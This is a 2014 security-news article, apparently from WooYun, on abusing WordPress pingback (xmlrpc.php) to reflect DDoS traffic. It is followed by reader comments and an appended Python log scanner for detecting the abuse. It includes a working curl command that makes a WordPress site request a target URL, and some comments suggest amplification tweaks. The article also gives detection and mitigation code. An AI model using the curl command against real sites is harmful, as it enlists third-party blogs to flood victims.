<main class="main-container ng-scope" ng-view=""><div class="main receptacle post-view ng-scope"><article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox=""><header><h1 class="entry-title ng-binding">More than 160,000 WordPress sites abused to launch DDoS attacks</h1><div class="entry-meta"><a target="_blank" class="author name ng-binding">news</a> <span class="bull">·</span> <time title="2014/03/13 10:21" ui-time="" datetime="2014/03/13 10:21" class="published ng-binding ng-isolate-scope">2014/03/13 10:21</time></div></header><section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml"><p>Any WordPress site with pingback enabled (it is enabled by default) can be used to launch a DDoS attack against other servers.</p><p>Consider the following log entries:</p><pre><code>#!bash
74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de" 
..
</code></pre><p>Note that every request also carries a random query string, such as <code>/?3162504=9747583</code>, to bypass caching.</p><p>Testing this attack technique takes nothing more than a single curl command:</p><pre><code>#!bash
$ curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d '&lt;methodCall&gt;&lt;methodName&gt;pingback.ping&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;http://victim.com&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;www.anywordpresssite.com/postchosen&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;'
</code></pre><p>To check whether your own site is being used in such an attack, look for log entries like the following:</p><pre><code>#!bash
93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:&lt;?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?&gt;\x0A&lt;methodCall&gt;\x0A&lt;methodName&gt;pingback.ping&lt;/methodName&gt;\x0A&lt;params&gt;\x0A &lt;param&gt;\x0A  &lt;value&gt;\x0A   &lt;string&gt;http://fastbet99.com/?1698491=8940641&lt;/string&gt;\x0A  &lt;/value&gt;\x0A &lt;/param&gt;\x0A &lt;param&gt;\x0A  &lt;value&gt;\x0A   &lt;string&gt;yoursite.com&lt;/string&gt;\x0A  &lt;/value&gt;\x0A &lt;/param&gt;\x0A&lt;/params&gt;\x0A&lt;/methodCall&gt;\x0A"

94.102.63.238 - - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"
</code></pre><p>The recommended way to defend against this is to block the XML-RPC (pingback) functionality by adding the following code to your WordPress theme:</p><pre><code>#!php
// Remove pingback.ping from the XML-RPC method table so this site will no
// longer fetch arbitrary URLs on behalf of remote pingback.ping callers.
add_filter( 'xmlrpc_methods', function( $methods ) {
    unset( $methods['pingback.ping'] );
    return $methods;
} );
</code></pre></section></article><div class="entry-controls clearfix"><div style="float:left;color:#9d9e9f;font-size:15px"><span>&copy; WooYun Knowledge Base. All rights reserved; reproduction without permission is prohibited.</span></div></div><div id="comments" class="comment-list clearfix"><div id="comment-list">
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">trustzone</span> <span class="reply-time">2014-05-31 14:58:27</span></div><p>I had always thought some of the URL requests hitting WordPress looked odd; reading this, it suddenly all makes sense!</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">独行猫儿</span> <span class="reply-time">2014-03-19 12:00:16</span></div><p>Isn't blocking the XML-RPC (pingback) functionality throwing the baby out with the bathwater?</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">xsser</span> <span class="reply-time">2014-03-18 16:03:54</span></div><p>Proxies aren't as easy to find as WordPress sites, are they?</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">瞌睡龙</span> <span class="reply-time">2014-03-18 15:36:04</span></div><p>What about making it GET a file several GB in size?<br>Tens of thousands of servers downloading one enormous file from your server~</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">云舒</span> <span class="reply-time">2014-03-18 15:21:19</span></div><p>Then why not just go after proxies...</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">xsser</span> <span class="reply-time">2014-03-18 15:03:06</span></div><p>Maybe it's to hide their own zombie machines?</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">云舒</span> <span class="reply-time">2014-03-18 14:58:21</span></div><p>This seems rather silly. Blog A, on receiving the POST packet, goes and GETs some page on the target, so the one that suffers most is the abused blog A itself; there's no amplification at all... Rather than using many blogs to ping one target, you'd be better off using one blog A to ping many blogs, with the POST packets plus the returned responses swamping blog A. Or is the blog I tested just configured unusually?</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">核攻击</span> <span class="reply-time">2014-03-17 10:34:35</span></div><p>Nice idea!</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">d3pT1</span> <span class="reply-time">2014-03-16 20:07:36</span></div><p>How do you test whether this vulnerability is present?</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">寂寞的瘦子</span> <span class="reply-time">2014-03-13 17:09:45</span></div><p>Every time I see that W logo I feel like I'm looking at a row of Shanghai Volkswagens. Anyone else?</p></div></div>
<div class="note-comment"><div class="content"><div class="comment-header"><span class="author-link">卡卡</span> <span class="reply-time">2014-03-13 10:47:09</span></div><p>The people of Dongguan need you!</p></div></div>
</div></div></div></main>
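Added here as a defender-side example, not part of the original post: a small Python scanner that runs both checks the article describes over access-log lines, flagging cache-busted GETs from "WordPress/x.y; url" user agents (your site is the flood target) and pingback.ping POSTs to xmlrpc.php (your site is being used as a reflector). It assumes the combined log format shown in the article, with the POST body appended as a final quoted field; the sample lines, addresses and hostnames are constructed.

```python
import re
from collections import Counter

# Combined-format access-log line; the page's format appends the POST body as a final quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<body>.*)")?$'
)
# A WordPress site fetching a pingback source identifies itself as "WordPress/<ver>; <blog URL>".
WP_UA_RE = re.compile(r'^WordPress/[\d.]+; (?P<blog>\S+)$')
# The flood requests carry a random "?<digits>=<digits>" query string to defeat caching.
CACHE_BUST_RE = re.compile(r'^/\?\d+=\d+$')

def classify(line):
    """('victim', reflecting blog) if a WordPress site floods us; ('reflector', target) if our
    own xmlrpc.php is being told to ping a third party; None for anything else."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    if m.group("method") == "GET" and CACHE_BUST_RE.match(m.group("path")):
        ua = WP_UA_RE.match(m.group("ua"))
        if ua:
            return ("victim", ua.group("blog"))
    if m.group("method") == "POST" and m.group("path").startswith("/xmlrpc.php"):
        body = m.group("body") or ""
        if "pingback.ping" in body:
            # The first URL in the body is the pingback sourceURI, i.e. the host being flooded.
            target = re.search(r"https?://[^\s\\<]+", body)
            return ("reflector", target.group(0) if target else "?")
    return None

def scan(lines):
    """Aggregate which blogs are reflecting traffic at us and which hosts we were told to hit."""
    counts = {"victim": Counter(), "reflector": Counter()}
    for line in lines:
        hit = classify(line)
        if hit:
            counts[hit[0]][hit[1]] += 1
    return {"reflecting_blogs": counts["victim"], "pingback_targets": counts["reflector"]}

# Constructed sample lines in the page's log format (RFC 5737 addresses, invented hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://blog-a.example"',
    '192.0.2.11 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://blog-b.example"',
    '192.0.2.10 - - [09/Mar/2014:11:05:28 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://blog-a.example"',
    '198.51.100.7 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<?xml version=\\x221.0\\x22?>\\x0A<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.example/?1698491=8940641</string></value></param><param><value><string>yoursite.example</string></value></param></params></methodCall>"',
    '203.0.113.5 - - [09/Mar/2014:11:06:00 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [09/Mar/2014:11:06:01 -0400] "GET /?p=12 HTTP/1.1" 200 5120 "-" "WordPress/3.8; http://blog-c.example"',
]
```

The last sample line is a legitimate pingback verification fetch (no random numeric query string) and is deliberately not flagged, so the scanner does not report ordinary WordPress-to-WordPress traffic.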